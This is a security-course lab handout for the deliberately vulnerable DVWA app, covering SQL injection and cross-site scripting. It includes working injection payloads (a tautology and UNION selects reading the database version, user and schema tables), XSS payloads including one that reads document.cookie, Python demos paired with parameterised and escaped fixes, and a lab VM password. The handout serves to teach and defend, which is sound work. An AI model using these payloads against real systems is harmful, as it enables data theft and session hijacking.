Damn Vulnerable Web Application (DVWA for short) is a purpose-built vulnerable PHP/MySQL web application. Its main goal is to help penetration testers and security professionals test their skills and tools. It also helps web developers understand how to secure web applications, and gives students and teachers a platform for learning about web application security and common vulnerabilities.
Your tutor will give you the connection details for the DVWA VM.
You can connect to the machine using RDP.
The password for the machine is Csec5616.
Launch the browser inside the VM and browse to localhost to reach DVWA.
Once logged in, check the security level under DVWA Security. It must be set to Low: the exercises below assume the unfiltered Low level, and the higher levels add input filtering that changes the results.
(Optional) For your own experiments, you can download DVWA from here.
(Optional) Configuration instructions can be found here.
Task 1 - SQL Injection Attacks
Your tutor will explain what an SQL injection attack is.
Go to the SQL Injection section of DVWA and try the following.
Enter a valid user ID in the User ID field and notice that you get information about a single user. This is the intended behaviour of the application.
Now enter %' or '0'='0. What do you see? Can you explain the result?
Try ' union select null, version() #. What do you see? Can you explain the result?
Try ' union select null, user() #. What do you see? Can you explain the result?
Now build injection payloads for the following tasks:
Display the database name
Display all tables listed in information_schema
Display only the user tables (those of the DVWA database rather than MySQL's system schemas) listed in information_schema
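The following is an added example written for this handout; it is not DVWA's own PHP and not part of the original exercise sheet. It rebuilds the query string the way DVWA's Low level does (string concatenation of the User ID into `SELECT first_name, last_name FROM users WHERE user_id = '...'`, quoted here from memory of the DVWA source, so treat the exact text as an assumption), lists one payload per task above, runs the portable tautology payload against an in-memory SQLite stand-in filled with constructed sample rows, and contrasts it with a parameterised query. The MySQL-only payloads (version(), user(), database(), information_schema, the `#` comment) are rendered as full queries but not executed, since SQLite does not support them. The `where table_schema = database()` filter is this editor's reading of "user tables".

```python
"""Added example: how DVWA's Low-level SQL injection page builds its query.

DVWA (Low) concatenates the User ID straight into the SQL text, roughly
    SELECT first_name, last_name FROM users WHERE user_id = '$id';
build_query() reproduces that pattern, vulnerable_lookup() runs it against an
in-memory SQLite stand-in filled with constructed sample rows, and safe_lookup()
shows the parameterised fix. version(), user(), database(), information_schema
and the '#' comment are MySQL-only, so those payloads are rendered as full
queries but not executed here.
"""
from __future__ import annotations

import sqlite3

# Constructed sample rows standing in for DVWA's users table (not DVWA's data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]

# Payloads for the tasks. The UNION needs exactly two columns because the
# original SELECT returns two; MySQL's '#' comment swallows the trailing quote
# and semicolon. A stray "or" in front of "union" would be a syntax error: the
# UNION has to follow a complete WHERE clause.
TASK_PAYLOADS = {
    "all users":     "%' or '0'='0",
    "db version":    "' union select null, version() #",
    "db user":       "' union select null, user() #",
    "database name": "' union select null, database() #",
    "all tables":    "' union select null, table_name from information_schema.tables #",
    # Assumption: "user tables" means the tables of the DVWA schema itself.
    "dvwa tables":   "' union select null, table_name from information_schema.tables "
                     "where table_schema = database() #",
}


def build_query(user_id: str) -> str:
    """Reproduce DVWA Low's string concatenation (the vulnerable pattern)."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}';"


def _connect() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def vulnerable_lookup(user_id: str) -> list[tuple[str, str]]:
    """Execute the concatenated query exactly as DVWA Low does."""
    con = _connect()
    try:
        return con.execute(build_query(user_id)).fetchall()
    finally:
        con.close()


def safe_lookup(user_id: str) -> list[tuple[str, str]]:
    """Parameterised query: the input is bound as data, never parsed as SQL."""
    con = _connect()
    try:
        return con.execute(
            "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
        ).fetchall()
    finally:
        con.close()


if __name__ == "__main__":
    for label, payload in TASK_PAYLOADS.items():
        print(f"{label:14} -> {build_query(payload)}")
    print("normal id 1    ->", vulnerable_lookup("1"))
    print("tautology      ->", vulnerable_lookup(TASK_PAYLOADS["all users"]))
    print("parameterised  ->", safe_lookup(TASK_PAYLOADS["all users"]))
```

Run it and compare the rendered queries with what the DVWA page returns: the tautology turns the WHERE clause into `user_id = '%' or '0'='0'`, which is true for every row, while the parameterised version compares the whole payload as a literal string and finds nothing.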
Task 2 - XSS Attacks
Your tutor will explain what XSS attacks are.
What are the two types of XSS attacks?
Try to perform both types of XSS attack on DVWA.
Stored cross-site scripting
Go to XSS (Stored)
Check the functionality of the Guestbook
Enter something like <script>alert()</script> in the message field and observe how it is stored and replayed every time a visitor views the page.
Reflected cross-site scripting
Go to XSS (Reflected)
Check the functionality by entering a name
Enter something like Sam<script>alert()</script> in the text box and observe what happens.
Change the script so that it reads the cookie instead.
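The following is an added example for both XSS exercises above; it is not DVWA's PHP and not part of the original handout. The `*_low` functions imitate how the Low-level pages echo input into HTML without encoding (the reflected page's `<pre>Hello ...</pre>` template and the guestbook's per-row markup are reproduced from memory, so treat the exact strings as assumptions), the `*_fixed` functions apply HTML entity encoding at output time, and `executable_scripts()` is a deliberately simple regex approximation of which inline scripts a browser would run. The guestbook entries are constructed sample data.

```python
"""Added example: why the DVWA XSS pages execute what you type.

DVWA's Low-level pages echo input into HTML without encoding. The reflected
page emits roughly '<pre>Hello ' . $_GET['name'] . '</pre>'; the stored page
writes every guestbook row into the page on each visit. The *_low functions
below imitate that (a stand-in written for this example, not DVWA's PHP), the
*_fixed functions entity-encode at output time, and executable_scripts() is a
simple regex approximation of what a browser would execute.
"""
from __future__ import annotations

import html
import re

# Payloads from the task sheet; the last one is the cookie-reading variant.
REFLECTED_PAYLOAD = "Sam<script>alert()</script>"
STORED_PAYLOAD = "<script>alert()</script>"
COOKIE_PAYLOAD = "<script>alert(document.cookie)</script>"

# Approximation: bodies of inline <script> elements. Real browsers run many
# more vectors (event handlers, javascript: URLs, ...), so this is a lower bound.
_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)


def executable_scripts(page: str) -> list[str]:
    """Return the bodies of the inline <script> elements found in page."""
    return [body.strip() for body in _SCRIPT.findall(page)]


def reflected_low(name: str) -> str:
    """Reflected XSS (Low): the name is concatenated into the response unencoded."""
    return f"<pre>Hello {name}</pre>"


def reflected_fixed(name: str) -> str:
    """Same template, but the name is entity-encoded so '<' becomes '&lt;'."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


def guestbook_low(entries: list[tuple[str, str]]) -> str:
    """Stored XSS (Low): every stored row is replayed unencoded on each render."""
    return "".join(
        f'<div id="guestbook_comments">Name: {name}<br />Message: {message}<br /></div>'
        for name, message in entries
    )


def guestbook_fixed(entries: list[tuple[str, str]]) -> str:
    """Encode each stored field at output time, regardless of how it was saved."""
    return "".join(
        f'<div id="guestbook_comments">Name: {html.escape(name)}<br />'
        f"Message: {html.escape(message)}<br /></div>"
        for name, message in entries
    )


if __name__ == "__main__":
    # Constructed guestbook: one benign entry, one carrying the cookie payload.
    entries = [("test", "This is a test comment."), ("eve", COOKIE_PAYLOAD)]
    print(reflected_low(REFLECTED_PAYLOAD))
    print("reflected, low   :", executable_scripts(reflected_low(REFLECTED_PAYLOAD)))
    print("reflected, fixed :", executable_scripts(reflected_fixed(REFLECTED_PAYLOAD)))
    # Two "visits": the stored script comes back on every render of the page.
    for visit in (1, 2):
        print(f"visit {visit}, low     :", executable_scripts(guestbook_low(entries)))
    print("stored, fixed    :", executable_scripts(guestbook_fixed(entries)))
```

The difference between the two attack types is where the payload lives: the reflected variant only fires for the request that carries it, while the stored variant is served from the guestbook to every later visitor until the row is deleted. Encoding at output time fixes both, because the browser then receives `&lt;script&gt;` text rather than a script element.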